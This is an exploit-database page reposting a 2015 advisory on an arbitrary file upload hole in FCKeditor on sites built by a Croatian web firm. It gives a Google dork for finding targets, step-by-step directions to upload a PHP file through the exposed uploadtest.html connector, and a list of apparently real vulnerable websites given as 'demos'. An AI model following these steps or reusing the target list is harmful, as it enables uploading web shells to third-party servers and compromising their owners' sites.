Advertisement






izrada (fckeditor) Arbitrary File Upload Vulnerability

CVE Category Price Severity
N/A CWE-434 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2015-04-24
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2015040165

Below is a copy:

[+] izrada (fckeditor) Arbitrary File Upload Vulnerability
[+] Exploit Title : izrada (FCKEDITOR)
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://it-b.hr
[+] Google Dork : intext:izrada web stranica: I.T.B.
[+] Date: 2015-04-23
[+] Tested On : Windows 7 / Mozilla Firefox
[+] Version : All Version


[+] exploit => fckeditor/editor/filemanager/connectors/uploadtest.html

[+] first go to => http://site.com/[path]

[+] then => http://www.site.com/[path]/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] select => Select the "File Uploader"> php ... upload to : Uploaded File URL:

[+] demos :

[+] http://croatiaX-flyfishing.com/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] http://lagirl-Xcosmetics.eu/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] http://mbbXs.hr/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] http://maXgic-records-shop.com/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] http://saXding-inox.hr/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] http://sXcp.hr/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] Special Tnx Mahdi.Hidden - ACC3SS

[+][+][+][+][+][+][+][+][+][+][+]
[+]Discovered By : Cyb3r_Dr4in[+]
[+][+][+][+][+][+][+][+][+][+][+]


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.